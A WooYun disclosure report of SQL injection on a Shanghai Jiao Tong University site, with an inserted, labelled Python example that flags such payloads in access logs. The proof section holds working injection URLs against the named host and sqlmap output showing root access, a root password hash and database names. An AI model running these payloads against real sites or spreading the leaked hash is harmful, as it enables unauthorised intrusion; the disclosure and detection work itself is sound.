Vulnerability summary

Defect ID: wooyun-2015-094978

Title: SQL injection with root privileges on a Shanghai Jiao Tong University site, affecting multiple databases

Vendor: sjtu.edu.cn

Author: Forever80s

Submitted: 2015-02-02 13:07

Fixed: 2015-03-19 13:08

Published: 2015-03-19 13:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-02-02: Details sent to the vendor, awaiting vendor handling
2015-02-02: Vendor has confirmed; details disclosed to the vendor only
2015-02-12: Details disclosed to core white hats and domain experts
2015-02-22: Details disclosed to regular white hats
2015-03-04: Details disclosed to intern white hats
2015-03-19: Details disclosed to the public

Brief description:

Detailed description:

SQL injection with root privileges on a Shanghai Jiao Tong University site, affecting multiple databases

Proof of vulnerability:

A ThinkPHP injection. Security cannot rely on the framework; it mainly depends on the programmer.
Site: oe.sjtu.edu.cn

http://oe.sjtu.edu.cn/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703 AND 3661=3661
Type: UNION query
Title: MySQL UNION query (NULL) - 19 columns
Payload: http://oe.sjtu.edu.cn:80/index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/-3770 UNION ALL SELECT NULL,CONCAT(0x3a63756a3a,0x426f486a
544f565067,0x3a6962773a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
--
[00:50:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0, PHP 5.2.17
back-end DBMS: MySQL 5
[00:50:36] [INFO] fetching database users
[00:50:37] [INFO] the SQL query used returns 25 entries
[00:50:37] [INFO] retrieved: "'root'@'localhost'"
[00:50:37] [INFO] retrieved: "'root'@'localhost'"
[00:50:38] [INFO] retrieved: "'root'@'localhost'"
[00:50:38] [INFO] retrieved: "'root'@'localhost'"
[00:50:38] [INFO] retrieved: "'root'@'localhost'"
[00:50:39] [INFO] retrieved: "'root'@'localhost'"
[00:50:39] [INFO] retrieved: "'root'@'localhost'"
[00:50:39] [INFO] retrieved: "'root'@'localhost'"
[00:50:40] [INFO] retrieved: "'root'@'localhost'"
[00:50:40] [INFO] retrieved: "'root'@'localhost'"
[00:50:41] [INFO] retrieved: "'root'@'localhost'"
[00:50:41] [INFO] retrieved: "'root'@'localhost'"
[00:50:41] [INFO] retrieved: "'root'@'localhost'"
[00:50:42] [INFO] retrieved: "'root'@'localhost'"
[00:50:42] [INFO] retrieved: "'root'@'localhost'"
[00:50:42] [INFO] retrieved: "'root'@'localhost'"
[00:50:43] [INFO] retrieved: "'root'@'localhost'"
[00:50:43] [INFO] retrieved: "'root'@'localhost'"
[00:50:43] [INFO] retrieved: "'root'@'localhost'"
[00:50:44] [INFO] retrieved: "'root'@'localhost'"
[00:50:44] [INFO] retrieved: "'root'@'localhost'"
[00:50:44] [INFO] retrieved: "'root'@'localhost'"
[00:50:45] [INFO] retrieved: "'root'@'localhost'"
[00:50:45] [INFO] retrieved: "'root'@'localhost'"
[00:50:45] [INFO] retrieved: "'root'@'localhost'"
database management system users [1]:
[*] 'root'@'localhost'
[00:50:45] [INFO] fetching database users password hashes
[00:50:46] [INFO] the SQL query used returns 1 entries
[00:50:46] [INFO] writing hashes to file 'c:\docume~1\admini~1\locals~1\temp\sqlmaphashes-ox6ete.txt' for eventual further processing with other tools
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] root [1]:
    password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[00:50:56] [INFO] fetching database names
[00:50:57] [INFO] the SQL query used returns 5 entries
[00:50:57] [INFO] retrieved: "information_schema"
[00:50:57] [INFO] retrieved: "jd"
[00:50:58] [INFO] retrieved: "mysql"
[00:50:58] [INFO] retrieved: "skl"
[00:50:58] [INFO] retrieved: "test"
available databases [5]:
[*] information_schema
[*] jd
[*] mysql
[*] skl
[*] test
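The injected parameter above travels in a ThinkPHP PATHINFO path segment (`/artID/1703`), not in a query string, so a check that only inspects `?key=value` pairs never sees it. The following is an added example, not code from the report or from the site: it parses that URL layout out of access-log lines and flags integer-ID parameters whose value is not a plain integer, which is the same validation the application should apply before the value reaches a query. The log lines are constructed for the example and the set of integer parameters is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the report), modelled on
# the ThinkPHP PATHINFO URLs in the proof above; spaces arrive percent-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Feb/2015:00:50:12 +0800] "GET /index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703 HTTP/1.1" 200 8123
10.0.0.5 - - [02/Feb/2015:00:50:36 +0800] "GET /index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1703%20AND%203661=3661 HTTP/1.1" 200 8123
10.0.0.5 - - [02/Feb/2015:00:50:37 +0800] "GET /index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/-3770%20UNION%20ALL%20SELECT%20NULL,NULL HTTP/1.1" 200 9044
10.0.0.9 - - [02/Feb/2015:00:51:02 +0800] "GET /index.php/Home/article/detailPage/parentID/0/cat_id/1662/artID/1704 HTTP/1.1" 200 7990
"""

# Parameters this application treats as integer IDs (assumption for the example).
INT_PARAMS = {"parentID", "cat_id", "artID"}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def parse_pathinfo(path):
    """Split a ThinkPHP PATHINFO URL into (module, controller, action, params).

    /index.php/Home/article/detailPage/k1/v1/k2/v2 -> ("Home", "article",
    "detailPage", {"k1": "v1", "k2": "v2"}); values are percent-decoded.
    """
    path = path.split("?", 1)[0]
    if "/index.php/" not in path:
        return None
    segs = [unquote(s) for s in path.split("/index.php/", 1)[1].split("/")]
    if len(segs) < 3:
        return None
    module, controller, action = segs[:3]
    rest = segs[3:]
    params = {rest[i]: rest[i + 1] for i in range(0, len(rest) - 1, 2)}
    return module, controller, action, params


def suspicious_params(params):
    """Return ID parameters whose value is not a plain (optionally negative) integer.
    A bare negative ID is odd but not injection; anything appended to it fails."""
    return {k: v for k, v in params.items()
            if k in INT_PARAMS and not re.fullmatch(r"-?\d+", v)}


def scan_log(text):
    """Return (line_no, action, offending params) for every request failing the check."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        parsed = parse_pathinfo(m.group(1)) if m else None
        if parsed is None:
            continue
        bad = suspicious_params(parsed[3])
        if bad:
            hits.append((n, parsed[2], bad))
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags lines 2 and 3 (the boolean-based and UNION payload shapes) and passes the two ordinary article requests.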


Remediation:

The developers will know what to do.

Copyright notice: please credit Forever80s@WooYun when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-02-02 15:21

Vendor reply:

Thank you, we will deal with it immediately!

Latest status:

None yet